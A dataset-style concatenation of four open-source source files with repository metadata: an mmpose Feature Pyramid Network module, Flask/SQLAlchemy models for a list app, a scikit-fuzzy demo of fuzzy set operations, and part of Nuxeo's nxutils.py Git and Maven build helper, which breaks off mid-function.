null
null
mmpose/models/necks/fpn.py
pallgeuer/mmpose
d3c17d5e6bdb9dbaca19f3bf53aa2802105355fd
[ "Apache-2.0" ]
null
null
null
# Copyright (c) OpenMMLab. All rights reserved. import torch.nn as nn import torch.nn.functional as F from mmcv.cnn import ConvModule, xavier_init from mmcv.runner import auto_fp16 from ..builder import NECKS @NECKS.register_module() class FPN(nn.Module): r"""Feature Pyramid Network. This is an implementation of paper `Feature Pyramid Networks for Object Detection <https://arxiv.org/abs/1612.03144>`_. Args: in_channels (list[int]): Number of input channels per scale. out_channels (int): Number of output channels (used at each scale). num_outs (int): Number of output scales. start_level (int): Index of the start input backbone level used to build the feature pyramid. Default: 0. end_level (int): Index of the end input backbone level (exclusive) to build the feature pyramid. Default: -1, which means the last level. add_extra_convs (bool | str): If bool, it decides whether to add conv layers on top of the original feature maps. Default to False. If True, it is equivalent to `add_extra_convs='on_input'`. If str, it specifies the source feature map of the extra convs. Only the following options are allowed - 'on_input': Last feat map of neck inputs (i.e. backbone feature). - 'on_lateral': Last feature map after lateral convs. - 'on_output': The last output feature map after fpn convs. relu_before_extra_convs (bool): Whether to apply relu before the extra conv. Default: False. no_norm_on_lateral (bool): Whether to apply norm on lateral. Default: False. conv_cfg (dict): Config dict for convolution layer. Default: None. norm_cfg (dict): Config dict for normalization layer. Default: None. act_cfg (dict): Config dict for activation layer in ConvModule. Default: None. upsample_cfg (dict): Config dict for interpolate layer. Default: dict(mode='nearest'). Example: >>> import torch >>> in_channels = [2, 3, 5, 7] >>> scales = [340, 170, 84, 43] >>> inputs = [torch.rand(1, c, s, s) ... 
for c, s in zip(in_channels, scales)] >>> self = FPN(in_channels, 11, len(in_channels)).eval() >>> outputs = self.forward(inputs) >>> for i in range(len(outputs)): ... print(f'outputs[{i}].shape = {outputs[i].shape}') outputs[0].shape = torch.Size([1, 11, 340, 340]) outputs[1].shape = torch.Size([1, 11, 170, 170]) outputs[2].shape = torch.Size([1, 11, 84, 84]) outputs[3].shape = torch.Size([1, 11, 43, 43]) """ def __init__(self, in_channels, out_channels, num_outs, start_level=0, end_level=-1, add_extra_convs=False, relu_before_extra_convs=False, no_norm_on_lateral=False, conv_cfg=None, norm_cfg=None, act_cfg=None, upsample_cfg=dict(mode='nearest')): super().__init__() assert isinstance(in_channels, list) self.in_channels = in_channels self.out_channels = out_channels self.num_ins = len(in_channels) self.num_outs = num_outs self.relu_before_extra_convs = relu_before_extra_convs self.no_norm_on_lateral = no_norm_on_lateral self.fp16_enabled = False self.upsample_cfg = upsample_cfg.copy() if end_level == -1 or end_level == self.num_ins - 1: self.backbone_end_level = self.num_ins assert num_outs >= self.num_ins - start_level else: # if end_level is not the last level, no extra level is allowed self.backbone_end_level = end_level + 1 assert end_level < self.num_ins assert num_outs == end_level - start_level + 1 self.start_level = start_level self.end_level = end_level self.add_extra_convs = add_extra_convs assert isinstance(add_extra_convs, (str, bool)) if isinstance(add_extra_convs, str): # Extra_convs_source choices: 'on_input', 'on_lateral', 'on_output' assert add_extra_convs in ('on_input', 'on_lateral', 'on_output') elif add_extra_convs: # True self.add_extra_convs = 'on_input' self.lateral_convs = nn.ModuleList() self.fpn_convs = nn.ModuleList() for i in range(self.start_level, self.backbone_end_level): l_conv = ConvModule( in_channels[i], out_channels, 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg if not self.no_norm_on_lateral else None, act_cfg=act_cfg, 
inplace=False) fpn_conv = ConvModule( out_channels, out_channels, 3, padding=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, act_cfg=act_cfg, inplace=False) self.lateral_convs.append(l_conv) self.fpn_convs.append(fpn_conv) # add extra conv layers (e.g., RetinaNet) extra_levels = num_outs - self.backbone_end_level + self.start_level if self.add_extra_convs and extra_levels >= 1: for i in range(extra_levels): if i == 0 and self.add_extra_convs == 'on_input': in_channels = self.in_channels[self.backbone_end_level - 1] else: in_channels = out_channels extra_fpn_conv = ConvModule( in_channels, out_channels, 3, stride=2, padding=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, act_cfg=act_cfg, inplace=False) self.fpn_convs.append(extra_fpn_conv) def init_weights(self): """Initialize model weights.""" for m in self.modules(): if isinstance(m, nn.Conv2d): xavier_init(m, distribution='uniform') @auto_fp16() def forward(self, inputs): """Forward function.""" assert len(inputs) == len(self.in_channels) # build laterals laterals = [ lateral_conv(inputs[i + self.start_level]) for i, lateral_conv in enumerate(self.lateral_convs) ] # build top-down path used_backbone_levels = len(laterals) for i in range(used_backbone_levels - 1, 0, -1): # In some cases, fixing `scale factor` (e.g. 2) is preferred, but # it cannot co-exist with `size` in `F.interpolate`. 
if 'scale_factor' in self.upsample_cfg: # fix runtime error of "+=" inplace operation in PyTorch 1.10 laterals[i - 1] = laterals[i - 1] + F.interpolate( laterals[i], **self.upsample_cfg) else: prev_shape = laterals[i - 1].shape[2:] laterals[i - 1] = laterals[i - 1] + F.interpolate( laterals[i], size=prev_shape, **self.upsample_cfg) # build outputs # part 1: from original levels outs = [ self.fpn_convs[i](laterals[i]) for i in range(used_backbone_levels) ] # part 2: add extra levels if self.num_outs > len(outs): # use max pool to get more levels on top of outputs # (e.g., Faster R-CNN, Mask R-CNN) if not self.add_extra_convs: for i in range(self.num_outs - used_backbone_levels): outs.append(F.max_pool2d(outs[-1], 1, stride=2)) # add conv layers on top of original feature maps (RetinaNet) else: if self.add_extra_convs == 'on_input': extra_source = inputs[self.backbone_end_level - 1] elif self.add_extra_convs == 'on_lateral': extra_source = laterals[-1] elif self.add_extra_convs == 'on_output': extra_source = outs[-1] else: raise NotImplementedError outs.append(self.fpn_convs[used_backbone_levels](extra_source)) for i in range(used_backbone_levels + 1, self.num_outs): if self.relu_before_extra_convs: outs.append(self.fpn_convs[i](F.relu(outs[-1]))) else: outs.append(self.fpn_convs[i](outs[-1])) return outs
42.269231
79
0.568016
795a8ca034204dbf6d91d59e13c32e18d9f88d42
7,154
py
Python
application/models.py
valr/lci
82a9ced51d66e5fe3432ff1d54a864ec396e4217
[ "MIT" ]
null
null
null
application/models.py
valr/lci
82a9ced51d66e5fe3432ff1d54a864ec396e4217
[ "MIT" ]
null
null
null
application/models.py
valr/lci
82a9ced51d66e5fe3432ff1d54a864ec396e4217
[ "MIT" ]
null
null
null
import enum import uuid from datetime import datetime from decimal import Decimal from time import time import jwt from flask import current_app from flask_login import UserMixin from sqlalchemy import types from werkzeug.security import check_password_hash, generate_password_hash from application import database # TODO: make a script with the below commands # export PYTHONDONTWRITEBYTECODE=1 # flask db init # flask db migrate -m 'init db' (or any other change after init) # flask db upgrade (flask db downgrade) # echo '.schema' | sqlite3 database/application.db > database/database.sql # chown -R flask-list:root database # chmod 700 database # chmod 600 database/application.db class SqliteNumeric(types.TypeDecorator): impl = types.String(1000) def process_bind_param(self, value, dialect): return str(value) def process_result_value(self, value, dialect): return Decimal(value if value is not None else "0") class User(database.Model, UserMixin): user_id = database.Column( database.Integer, index=True, nullable=False, unique=True, primary_key=True ) email = database.Column( database.String(1000), index=True, nullable=False, unique=True ) password_hash = database.Column(database.String(128), nullable=False) active = database.Column(database.Boolean(), nullable=False) updated_on = database.Column( database.DateTime, nullable=False, default=datetime.utcnow, onupdate=datetime.utcnow, ) filter_ = database.Column(database.String(1000)) version_id = database.Column(database.String(32), nullable=False) __mapper_args__ = { "version_id_col": version_id, "version_id_generator": lambda version: uuid.uuid4().hex, } __table_args__ = {"sqlite_autoincrement": True} def __repr__(self): return f"<User id: {self.user_id} email: {self.email}>" def get_id(self): return str(self.user_id) def set_password(self, password): self.password_hash = generate_password_hash(password) def verify_password(self, password): return check_password_hash(self.password_hash, password) def get_token(self, 
subject, expires_in=600): claims = {"sub": subject, "id": self.user_id, "exp": time() + expires_in} key = current_app.config["SECRET_KEY"] return jwt.encode(claims, key, algorithm="HS256") @staticmethod def verify_token(token, subject): try: key = current_app.config["SECRET_KEY"] claims = jwt.decode(token, key, algorithms=["HS256"]) user_id = claims.get("id") if claims.get("sub") == subject else None if not user_id: return except jwt.InvalidTokenError: return return User.query.get(user_id) class Category(database.Model): category_id = database.Column( database.Integer, index=True, nullable=False, unique=True, primary_key=True ) name = database.Column( database.String(1000), index=True, nullable=False, unique=True ) filter_ = database.Column(database.String(1000), index=True, nullable=False) version_id = database.Column(database.String(32), nullable=False) # one to many: category <-> item items = database.relationship("Item", back_populates="category") __mapper_args__ = { "version_id_col": version_id, "version_id_generator": lambda version: uuid.uuid4().hex, } __table_args__ = {"sqlite_autoincrement": True} def __repr__(self): return f"<Category id: {self.category_id} name: {self.name}>" class Item(database.Model): item_id = database.Column( database.Integer, index=True, nullable=False, unique=True, primary_key=True ) name = database.Column( database.String(1000), index=True, nullable=False # not unique ) version_id = database.Column(database.String(32), nullable=False) # one to many: category <-> item category = database.relationship("Category", back_populates="items") category_id = database.Column( database.Integer, database.ForeignKey("category.category_id", ondelete="RESTRICT"), index=True, nullable=False, ) # many to many: list <-> item lists = database.relationship( "ListItem", back_populates="item", cascade="save-update, merge, delete", passive_deletes=True, ) __mapper_args__ = { "version_id_col": version_id, "version_id_generator": lambda version: 
uuid.uuid4().hex, } __table_args__ = ( database.UniqueConstraint("name", "category_id"), {"sqlite_autoincrement": True}, ) def __repr__(self): return f"<Item id: {self.item_id} name: {self.name}>" class List(database.Model): list_id = database.Column( database.Integer, index=True, nullable=False, unique=True, primary_key=True ) name = database.Column( database.String(1000), index=True, nullable=False, unique=True ) version_id = database.Column(database.String(32), nullable=False) # many to many: list <-> item items = database.relationship( "ListItem", back_populates="list_", cascade="save-update, merge, delete", passive_deletes=True, ) __mapper_args__ = { "version_id_col": version_id, "version_id_generator": lambda version: uuid.uuid4().hex, } __table_args__ = {"sqlite_autoincrement": True} def __repr__(self): return f"<List id: {self.list_id} name: {self.name}>" class ListItemType(enum.Enum): none = 0 selection = 1 number = 2 text = 3 def next(self): return ListItemType((self.value + 1) % 4) class ListItem(database.Model): list_id = database.Column( database.Integer, database.ForeignKey("list.list_id", ondelete="CASCADE"), index=True, nullable=False, primary_key=True, ) item_id = database.Column( database.Integer, database.ForeignKey("item.item_id", ondelete="CASCADE"), index=True, nullable=False, primary_key=True, ) type_ = database.Column("type", database.Enum(ListItemType), nullable=False) selection = database.Column("selection", database.Boolean, nullable=False) # number = database.Column("number", database.Numeric, nullable=False) number = database.Column("number", SqliteNumeric, nullable=False) text = database.Column("text", database.String(1000), nullable=False) version_id = database.Column(database.String(32), nullable=False) list_ = database.relationship("List", back_populates="items") item = database.relationship("Item", back_populates="lists") __mapper_args__ = { "version_id_col": version_id, "version_id_generator": lambda version: uuid.uuid4().hex, } 
__table_args__ = ( database.PrimaryKeyConstraint("list_id", "item_id"), {"sqlite_autoincrement": True}, ) def __repr__(self): return f"<ListItem list: {self.list_id} item: {self.item_id}>"
31.377193
83
0.66676
795a8cde653f35f1ec300e920ebadb2d4959688a
2,804
py
Python
fuzzy_logic/fuzzy_operations.py
Mu-L/TheAlgorithmsOfPython
f9aa4c996f6a9f40195cc9d5448141049dfb75e4
[ "MIT" ]
6
2020-06-23T11:56:55.000Z
2021-10-03T17:21:34.000Z
fuzzy_logic/fuzzy_operations.py
Avinash987/Python
2d3d660155241113b23e4ed810e05479b2fc4bba
[ "MIT" ]
3
2020-06-08T07:03:15.000Z
2020-06-08T08:41:22.000Z
fuzzy_logic/fuzzy_operations.py
Avinash987/Python
2d3d660155241113b23e4ed810e05479b2fc4bba
[ "MIT" ]
2
2021-03-22T17:01:30.000Z
2021-08-12T17:06:12.000Z
"""README, Author - Jigyasa Gandhi(mailto:jigsgandhi97@gmail.com) Requirements: - scikit-fuzzy - numpy - matplotlib Python: - 3.5 """ import numpy as np import skfuzzy as fuzz if __name__ == "__main__": # Create universe of discourse in Python using linspace () X = np.linspace(start=0, stop=75, num=75, endpoint=True, retstep=False) # Create two fuzzy sets by defining any membership function # (trapmf(), gbellmf(), gaussmf(), etc). abc1 = [0, 25, 50] abc2 = [25, 50, 75] young = fuzz.membership.trimf(X, abc1) middle_aged = fuzz.membership.trimf(X, abc2) # Compute the different operations using inbuilt functions. one = np.ones(75) zero = np.zeros((75,)) # 1. Union = max(µA(x), µB(x)) union = fuzz.fuzzy_or(X, young, X, middle_aged)[1] # 2. Intersection = min(µA(x), µB(x)) intersection = fuzz.fuzzy_and(X, young, X, middle_aged)[1] # 3. Complement (A) = (1- min(µA(x)) complement_a = fuzz.fuzzy_not(young) # 4. Difference (A/B) = min(µA(x),(1- µB(x))) difference = fuzz.fuzzy_and(X, young, X, fuzz.fuzzy_not(middle_aged)[1])[1] # 5. Algebraic Sum = [µA(x) + µB(x) – (µA(x) * µB(x))] alg_sum = young + middle_aged - (young * middle_aged) # 6. Algebraic Product = (µA(x) * µB(x)) alg_product = young * middle_aged # 7. Bounded Sum = min[1,(µA(x), µB(x))] bdd_sum = fuzz.fuzzy_and(X, one, X, young + middle_aged)[1] # 8. Bounded difference = min[0,(µA(x), µB(x))] bdd_difference = fuzz.fuzzy_or(X, zero, X, young - middle_aged)[1] # max-min composition # max-product composition # Plot each set A, set B and each operation result using plot() and subplot(). 
import matplotlib.pyplot as plt plt.figure() plt.subplot(4, 3, 1) plt.plot(X, young) plt.title("Young") plt.grid(True) plt.subplot(4, 3, 2) plt.plot(X, middle_aged) plt.title("Middle aged") plt.grid(True) plt.subplot(4, 3, 3) plt.plot(X, union) plt.title("union") plt.grid(True) plt.subplot(4, 3, 4) plt.plot(X, intersection) plt.title("intersection") plt.grid(True) plt.subplot(4, 3, 5) plt.plot(X, complement_a) plt.title("complement_a") plt.grid(True) plt.subplot(4, 3, 6) plt.plot(X, difference) plt.title("difference a/b") plt.grid(True) plt.subplot(4, 3, 7) plt.plot(X, alg_sum) plt.title("alg_sum") plt.grid(True) plt.subplot(4, 3, 8) plt.plot(X, alg_product) plt.title("alg_product") plt.grid(True) plt.subplot(4, 3, 9) plt.plot(X, bdd_sum) plt.title("bdd_sum") plt.grid(True) plt.subplot(4, 3, 10) plt.plot(X, bdd_difference) plt.title("bdd_difference") plt.grid(True) plt.subplots_adjust(hspace=0.5) plt.show()
26.961538
82
0.616619
795a8cef4cab09edebcf0ed7a03a55b0050f9701
23,345
py
Python
scripts/nxutils.py
sailfly/nuxeo
24aa96d078be77ce09973b08b38ee1498c0903bf
[ "Apache-2.0" ]
null
null
null
scripts/nxutils.py
sailfly/nuxeo
24aa96d078be77ce09973b08b38ee1498c0903bf
[ "Apache-2.0" ]
null
null
null
scripts/nxutils.py
sailfly/nuxeo
24aa96d078be77ce09973b08b38ee1498c0903bf
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python """ (C) Copyright 2012-2013 Nuxeo SA (http://nuxeo.com/) and contributors. All rights reserved. This program and the accompanying materials are made available under the terms of the GNU Lesser General Public License (LGPL) version 2.1 which accompanies this distribution, and is available at http://www.gnu.org/licenses/lgpl-2.1.html This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. Contributors: Julien Carsique Utilities for Python scripts.""" import ConfigParser import errno import os import platform import re import shlex import shutil import subprocess import sys import time import urllib2 from zipfile import ZIP_DEFLATED, ZipFile from distutils.version import LooseVersion import warnings REQUIRED_GIT_VERSION = "1.8.4" SUPPORTED_GIT_ONLINE_URLS = "http://", "https://", "git://", "git@" DEFAULT_MP_CONF_URL = "https://raw.github.com/nuxeo/integration-scripts/master/marketplace.ini" class ExitException(Exception): def __init__(self, return_code, message=None): super(ExitException, self).__init__(message) self.return_code = return_code self.message = message def deprecated(func): '''This is a decorator which can be used to mark functions as deprecated. It will result in a warning being emitted when the function is used.''' def new_func(*args, **kwargs): warnings.warn("Call to deprecated function {}.".format(func.__name__), category=DeprecationWarning) return func(*args, **kwargs) new_func.__name__ = func.__name__ new_func.__doc__ = func.__doc__ new_func.__dict__.update(func.__dict__) return new_func # pylint: disable=R0902 class Repository(object): """Nuxeo repository manager. 
Provides recursive Git and Shell functions.""" def __init__(self, basedir, alias, dirmapping=True, is_nuxeoecm=True): assert_git_config() (self.basedir, self.driveletter, self.oldbasedir) = long_path_workaround_init(basedir, dirmapping) self.mp_dir = os.path.join(self.basedir, "marketplace") if not os.path.isdir(self.mp_dir): os.mkdir(self.mp_dir) self.alias = alias # find the remote URL os.chdir(self.basedir) remote_lines = check_output("git remote -v").split("\n") for remote_line in remote_lines: remote_alias, remote_url, _ = remote_line.split() if alias == remote_alias: break self.is_online = remote_url.startswith(SUPPORTED_GIT_ONLINE_URLS) if self.is_online: self.url_pattern = re.sub("(.*)nuxeo", r"\1module", remote_url) else: self.url_pattern = remote_url + "/module" self.modules = [] self.sub_modules = {} self.addons = [] self.optional_addons = [] self.is_nuxeoecm = is_nuxeoecm def cleanup(self): long_path_workaround_cleanup(self.driveletter, self.oldbasedir) # pylint: disable=C0103 @deprecated def eval_modules(self): """Set the list of Nuxeo addons in 'self.modules'.""" self.modules = self.retrieve_modules(self.basedir) @deprecated def eval_addons(self): """Set the list of Nuxeo addons in 'self.addons' and 'self.optional_addons'.""" addons_dir = os.path.join(self.basedir, "addons") self.addons = self.retrieve_modules(addons_dir) self.optional_addons = self.retrieve_modules(addons_dir, "pom-optionals.xml") def execute_on_modules(self, function, with_optionals=False): """Executes the given function on each first and second level modules of Nuxeo repository. 'function' the function to execute on module. 
'with_optionals' weither or not we execute function on optionals (modules with pom-optionals.xml file) """ cwd = os.getcwd() os.chdir(self.basedir) if not self.modules and self.is_nuxeoecm: self.modules = self.retrieve_modules(self.basedir) # First level addons = ["addons", "addons-core"] for module in self.modules: function(module) # Second level - addons if module in addons: if not self.is_online: self.url_pattern = self.url_pattern.replace("module", "%s/module" % module) os.chdir(module) if module not in self.sub_modules and self.is_nuxeoecm: module_dir = os.path.join(self.basedir, module) self.sub_modules[module] = self.retrieve_modules(module_dir) # Handle optionals if with_optionals: self.sub_modules[module] = self.sub_modules[module] + self.retrieve_modules(module_dir, "pom-optionals.xml") for sub_module in self.sub_modules[module]: function(sub_module) os.chdir(self.basedir) if not self.is_online: self.url_pattern = self.url_pattern.replace("%s/module" % module, "module") os.chdir(cwd) @staticmethod def retrieve_modules(project_dir, pom_name = "pom.xml"): """Retrieve all modules of input Maven project and return it.""" modules = [] if os.path.exists(os.path.join(project_dir, pom_name)): log("Modules list calculated from the POM file %s/%s" % (project_dir, pom_name)) cwd = os.getcwd() os.chdir(project_dir) f = open(pom_name, "r") pom_content = f.read() modules = re.findall("<module>(.*?)</module>", pom_content) f.close() os.chdir(cwd) modules = sorted(set(modules)) return modules def git_pull(self, module, version, fallback_branch=None): """Git clone or fetch, then update. 'module': the Git module to run on. 'version': the version to checkout. 
'fallback_branch': the branch to fallback on when 'version' is not found locally or remotely.""" repo_url = self.url_pattern.replace("module", module) cwd = os.getcwd() log("[%s]" % module) if os.path.isdir(module): os.chdir(module) system_with_retries("git fetch %s" % (self.alias)) else: system_with_retries("git clone %s --origin %s" % (repo_url, self.alias)) os.chdir(module) self.git_update(version, fallback_branch) os.chdir(cwd) def system_recurse(self, command, with_optionals=False): """Execute the given command on current and sub-modules. 'command': the command to execute. If 'with_optionals', also recurse on "optional" addons.""" cwd = os.getcwd() os.chdir(self.basedir) log("[.]") system(command) self.execute_on_modules(lambda module: self.system_module(command, module), with_optionals) os.chdir(cwd) @staticmethod def system_module(command, module): """Execute the given command on given module. 'command': the command to execute. 'module': the module into execute command.""" cwd = os.getcwd() os.chdir(module) log("[%s]" % module) system(command) os.chdir(cwd) def git_recurse(self, command, with_optionals=False): """Execute the given Git command on current and sub-modules. It ignores non Git repositories. 'command': the command to execute. If 'with_optionals', also recurse on "optional" addons.""" command = "git " + command cwd = os.getcwd() os.chdir(self.basedir) log("[.]") system(command) self.execute_on_modules(lambda module: self.git_module(command, module), with_optionals) os.chdir(cwd) @staticmethod def git_module(command, module): """Execute the given Shell command on the given module. It ignores non Git repositories. 'command': the command to execute. 'module': the Git sub-directory where to execute the command.""" cwd = os.getcwd() os.chdir(module) if os.path.isdir(".git"): log("[%s]" % module) system(command) os.chdir(cwd) def archive(self, archive, version=None, with_optionals=False): """Archive the sources of current and sub-repositories. 
'archive': full path of archive to generate. 'version': version to archive, defaults to current version. If 'with_optionals', also recurse on "optional" addons.""" if version is None: version = self.get_current_version() archive_dir = os.path.join(os.path.dirname(archive), "sources") cwd = os.getcwd() os.chdir(self.basedir) if os.path.isdir(archive_dir): shutil.rmtree(archive_dir) os.mkdir(archive_dir) log("[.]") p = system("git archive %s" % version, wait=False) # pylint: disable=E1103 system("tar -C %s -xf -" % archive_dir, stdin=p.stdout) self.execute_on_modules(lambda module: self.archive_module(archive_dir, version, module), with_optionals) make_zip(archive, archive_dir) shutil.rmtree(archive_dir) os.chdir(cwd) @staticmethod def archive_module(archive_dir, version, module): """Archive the sources of a the given Git sub-directory. 'archive_dir': full path of archive to generate. 'version': version to archive, defaults to current version. 'module': the Git sub-directory to archive.""" cwd = os.getcwd() os.chdir(module) log("[%s]" % module) p = system("git archive --prefix=%s/ %s" % (module, version), wait=False) system("tar -C %s -xf -" % archive_dir, stdin=p.stdout) os.chdir(cwd) def git_update(self, version, fallback_branch=None): """Git update using checkout, stash (if needed) and rebase. 'version': the version to checkout. 
'fallback_branch': the branch to fallback on when 'version' is not found locally or remotely.""" is_tag = version in check_output("git tag --list %s" % version).split() is_local_branch = version in check_output("git branch --list %s" % version).split() is_remote_branch = "%s/%s" % (self.alias, version) in check_output( "git branch -r --list %s/%s" % (self.alias, version)).split() if is_tag: system("git checkout %s -q" % version) elif is_local_branch: system("git checkout %s -q" % version) if is_remote_branch: system("git rebase -q --autostash %s/%s" % (self.alias, version)) elif is_remote_branch: system("git checkout --track -b %s %s/%s -q" % (version, self.alias, version), fallback_branch is None) elif fallback_branch: log("Branch %s not found, fallback on %s" % (version, fallback_branch)) self.git_update(fallback_branch) else: log("Branch %s not found" % version) log("") def get_mp_config(self, marketplace_conf, user_defaults = {}): """Return the Marketplace packages configuration.""" defaults = {'other_versions': None, 'prepared': 'False', 'performed': 'False', 'branched': 'False', "profiles": '', "auto_increment_policy": "auto_patch"} defaults.update(user_defaults) mp_config = ConfigParser.SafeConfigParser(defaults=defaults) if marketplace_conf is None: no_remote = True else: try: mp_config.readfp(urllib2.urlopen(marketplace_conf)) log("Read configuration from: '%s'" % marketplace_conf) no_remote = False except urllib2.URLError: no_remote = True except ValueError: no_remote = True mp_config = self.save_mp_config(mp_config, True, no_remote) return mp_config def save_mp_config(self, mp_config, read_first=False, fail_if_no_file=False): """Save the Marketplace packages configuration.""" configfile_path = os.path.join(self.mp_dir, "release.ini") if read_first and os.path.isfile(configfile_path): log("Read configuration from: '%s'" % configfile_path) mp_config.read(configfile_path) if fail_if_no_file and not os.path.isfile(configfile_path): raise ExitException(1, 
"Missing configuration: '%s'" % configfile_path) mp_config.write(open(configfile_path, 'w')) log("Configuration saved: '%s'" % configfile_path) return mp_config def clone_mp(self, marketplace_conf, fallback_branch=None): """Clone or update Nuxeo Package repositories. Returns the Nuxeo Packages configuration.""" if marketplace_conf == '': marketplace_conf = DEFAULT_MP_CONF_URL if not marketplace_conf: return os.chdir(self.mp_dir) user_defaults={} if self.is_nuxeoecm: user_defaults["nuxeo-branch"] = self.get_current_version() mp_config = self.get_mp_config(marketplace_conf, user_defaults) for marketplace in mp_config.sections(): self.git_pull(marketplace, mp_config.get(marketplace, "branch"), fallback_branch=fallback_branch) return mp_config def clone(self, version=None, fallback_branch=None, with_optionals=False, marketplace_conf=None): """Clone or update whole Nuxeo repository. 'version': the version to checkout; defaults to current version. 'fallback_branch': the branch to fallback on when 'version' is not found locally or remotely. If 'with_optionals', also clone/update "optional" addons. 
'marketplace_conf': URL of configuration file listing the Marketplace repositories to clone or update.""" cwd = os.getcwd() os.chdir(self.basedir) log("[.]") system_with_retries("git fetch %s" % (self.alias)) if version is None: version = self.get_current_version() self.git_update(version, fallback_branch) if self.is_nuxeoecm: self.execute_on_modules(lambda module: self.clone_module(module, version, fallback_branch), with_optionals) self.clone_mp(marketplace_conf, fallback_branch) os.chdir(cwd) def clone_module(self, module, version, fallback_branch): # Ignore modules which are not Git sub-repositories if not os.path.isdir(module) or os.path.isdir(os.path.join(module, ".git")): self.git_pull(module, version, fallback_branch) @staticmethod def get_current_version(): """Return branch or tag version of current Git workspace.""" t = check_output("git describe --all").split("/") return t[-1] def mvn(self, commands, skip_tests=False, skip_ITs=False, profiles=None, dryrun=False): """Run Maven commands (install, package, deploy, ...) on the whole sources (including addons and all distributions) with the given parameters. 'commands': the commands to run. 'skip_tests': whether to skip or not the tests. 'skip_ITs': whether to skip or not the Integration Tests. 'profiles': comma-separated additional Maven profiles to use. 
If 'dryrun', then print command without executing them.""" skip_tests_param = "-fae" if skip_tests: skip_tests_param += " -DskipTests=true" if skip_ITs: skip_tests_param += " -DskipITs=true" profiles_param = [] if self.is_nuxeoecm: profiles_param += ["addons", "distrib"] if profiles: profiles_param += profiles.split(',') if profiles_param: profiles_param = " -P" + ','.join(profiles_param) else: profiles_param = "" system("mvn %s %s%s -Dnuxeo.tests.random.mode=BYPASS" % ( commands, skip_tests_param, profiles_param), delay_stdout=False, run=not dryrun) def log(message, out=sys.stdout): out.write(message + os.linesep) out.flush() # Can't this method be replaced with system? # pylint: disable=C0103 def check_output(cmd): """Return Shell command output.""" args = shlex.split(cmd) try: p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=platform.system() == "Windows") # pylint: disable=C0103 except OSError, e: log("$> " + cmd) if e.errno == errno.ENOENT: raise ExitException(1, "Command not found: '%s'" % args[0]) else: # re-raise unexpected exception raise out, err = p.communicate() retcode = p.returncode if retcode != 0: if err is None or err == "": err = out raise ExitException(retcode, "Command '%s' returned non-zero exit code (%s)\n%s" % (cmd, retcode, err)) return out.strip() # pylint: disable=R0912,R0913 def system(cmd, failonerror=True, delay_stdout=True, logOutput=True, wait=True, run=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE): """Shell execution. 'cmd': the command to execute. If 'failonerror', command execution failure raises an ExitException. If 'delay_stdout', output is flushed at the end of command execution. If not 'run', the command is only printed. If not 'wait', the process is executed in background and returned as 'p'. 'stdin', 'stdout', 'stderr' are only used if 'delay_stdout' is True. If not 'logOutput', output is only logged in case of exception. 
Only available if 'delay_stdout'""" log("$> " + cmd) if not run: return args = shlex.split(cmd) try: if delay_stdout: if logOutput: # Merge stderr with stdout stderr = subprocess.STDOUT p = subprocess.Popen(args, stdin=stdin, stdout=stdout, stderr=stderr, shell=platform.system() == "Windows") if wait: out, err = p.communicate() if logOutput: sys.stdout.write(out) sys.stdout.flush() else: logOutput = True p = subprocess.Popen(args, shell=platform.system() == "Windows") if wait: p.wait() except OSError, e: if e.errno == errno.ENOENT: raise ExitException(1, "Command not found: '%s'" % args[0]) else: # re-raise unexpected exception raise if not wait: return p # pylint: disable=E1103 retcode = p.returncode if retcode != 0: if failonerror: if logOutput: raise ExitException( retcode, "Command '%s' returned non-zero exit code (%s)" % (cmd, retcode)) else: if err is None or err == "": err = out raise ExitException( retcode, "Command '%s' returned non-zero exit code (%s)\n%s" % (cmd, retcode, err)) return retcode def system_with_retries(cmd, failonerror=True): """Shell execution with ten retries in case of failures. 'cmd': the command to execute. If 'failonerror', latest command execution failure raises an ExitException. """ retries = 0 while True: retries += 1 retcode = system(cmd, failonerror=False) if retcode == 0: return 0 elif retries > 10: return system(cmd, failonerror=failonerror) else: log("Error executing %s - retrying in 10 seconds..." % cmd, sys.stderr) time.sleep(10) def long_path_workaround_init(basedir, dirmapping=True): """Windows only. 
Try to map the 'basedir' to an unused drive letter to shorten path names.""" newdir = basedir driveletter = None if platform.system() == "Windows" and dirmapping: for letter in "GHIJKLMNOPQRSTUVWXYZ": if not os.path.isdir("%s:\\" % (letter,)): system("SUBST %s: \"%s\"" % (letter, basedir)) time.sleep(10) driveletter = letter newdir = driveletter + ":\\" break return newdir, driveletter, basedir def long_path_workaround_cleanup(driveletter, basedir): """Windows only. Cleanup the directory mapping if any.""" if driveletter is not None: os.chdir(basedir) system("SUBST %s: /D" % (driveletter,), failonerror=False) def assert_git_config(): """Check Git configuration.""" t = check_output("git --version").split()[-1] if LooseVersion(t) < LooseVersion(REQUIRED_GIT_VERSION): raise ExitException(1, "Requires Git version %s+ (detected %s)" % (REQUIRED_GIT_VERSION, t)) try: t = check_output("git config --get-all color.branch") except ExitException, e: # Error code 1 is fine (default value) if e.return_code > 1: log("[WARN] %s" % e.message, sys.stderr) try: t += check_output("git config --get-all color.status") except ExitException, e: # Error code 1 is fine (default value) if e.return_code > 1: log("[WARN] %s" % e.message, sys.stderr) if "always" in t: raise ExitException(1, "The git color mode must not be always, try:" + "\n git config --global color.branch auto" + "\n git config --global color.status auto") def make_zip(archive, rootdir=None, basedir=None, mode="w"): """Create a zip file from all the files under 'rootdir'/'basedir'. If 'rootdir' is not specified, it uses the current directory. If 'basedir' is not specified, it uses the current directory constant '.'. The 'mode' must be 'w' (write) or 'a' (append).""" cwd = os.getcwd() if rootdir is not None: os.chdir(rootdir) try: if basedir is None: basedir = os.curdir log("Creating %s with %s ..." 
